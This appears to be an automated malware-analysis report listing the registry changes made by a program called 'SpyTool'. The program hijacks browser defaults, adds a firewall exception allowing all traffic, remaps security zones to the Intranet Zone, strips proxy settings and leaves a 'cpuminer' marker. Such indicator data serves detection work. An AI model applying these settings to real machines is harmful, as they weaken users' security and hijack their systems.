"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150925"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 D2 EF A0 E0 6D F4 46 9C 8C A1 A1 14 43 F1 C4"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process nsp45.tmp:596 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 A0 43 49 52 DC 06 2B 32 72 07 86 97 D3 C8 D4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:1408 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E C2 4F ED 84 DE 61 F6 85 8C B7 6E D7 D9 57 BF"
The process taskkill.exe:248 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 40 25 A9 59 49 D4 95 5F D1 44 C1 BA 2C 69 D2"
The process taskkill.exe:1092 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 63 DA 08 7C 5B DC 38 2B 13 69 73 96 73 D9 0B"
The process wmic.exe:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 6B 02 51 21 C9 D4 D0 BE A9 51 42 0F DD 9E 04"
The process amisid.exe:496 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "975F29BE8C8FD0BC5E8EBA2BBF1B629F"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC A4 89 A4 87 DB DB 5A 69 41 0B 02 CC B9 BE 8D"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process amisid.exe:600 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 0A D9 92 60 D5 EE 28 B7 7D 87 3C F5 50 BB DA"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\InternetTurbo]
"UID" = "975F29BE8C8FD0BC5E8EBA2BBF1B629F"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process tasklist.exe:1852 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 4F 09 7D 56 91 75 35 10 33 EF F8 ED 63 8D 30"
The process tasklist.exe:492 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 30 1C 8C 24 D3 3B 18 53 C9 78 61 CB 08 DB 02"
The process nsr21.tmp:908 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss25.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 0A A8 1E 68 9B 79 BA 8F 55 F1 DF 64 03 5E 77"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
